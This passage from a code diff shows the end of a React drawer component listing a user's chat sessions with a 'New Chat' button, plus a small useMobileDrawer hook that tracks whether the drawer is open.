<Drawer.Overlay className="fixed inset-0 z-[60] bg-black/10 backdrop-blur-sm" />
<Drawer.Content className="fixed left-0 top-0 z-[70] flex h-full w-80 flex-col border-r border-zinc-200 bg-zinc-50">
<div className="shrink-0 border-b border-zinc-200 p-4">
<div className="flex items-center justify-between">
<Drawer.Title className="text-lg font-semibold text-zinc-800">
Your chats
</Drawer.Title>
<Button
variant="icon"
size="icon"
aria-label="Close sessions"
onClick={onClose}
>
<X width="1.25rem" height="1.25rem" />
</Button>
</div>
</div>
<div
className={cn(
"flex min-h-0 flex-1 flex-col overflow-y-auto px-3 py-3",
scrollbarStyles,
)}
>
<SessionsList
sessions={sessions}
currentSessionId={currentSessionId}
isLoading={isLoading}
hasNextPage={hasNextPage}
isFetchingNextPage={isFetchingNextPage}
onSelectSession={onSelectSession}
onFetchNextPage={onFetchNextPage}
/>
</div>
{hasActiveSession && (
<div className="shrink-0 bg-white p-3 shadow-[0_-4px_6px_-1px_rgba(0,0,0,0.05)]">
<Button
variant="primary"
size="small"
onClick={onNewChat}
className="w-full"
leftIcon={<PlusIcon width="1rem" height="1rem" />}
>
New Chat
</Button>
</div>
)}
</Drawer.Content>
</Drawer.Portal>
</Drawer.Root>
);
}

View File

@@ -0,0 +1,24 @@
import { useState } from "react";
export function useMobileDrawer() {
const [isDrawerOpen, setIsDrawerOpen] = useState(false);
const handleOpenDrawer = () => {
setIsDrawerOpen(true);
};
const handleCloseDrawer = () => {
setIsDrawerOpen(false);
};
const handleDrawerOpenChange = (open: boolean) => {
setIsDrawerOpen(open);
};
return {
isDrawerOpen,
handleOpenDrawer,
handleCloseDrawer,
handleDrawerOpenChange,
};
}

Some files were not shown because too many files have changed in this diff Show More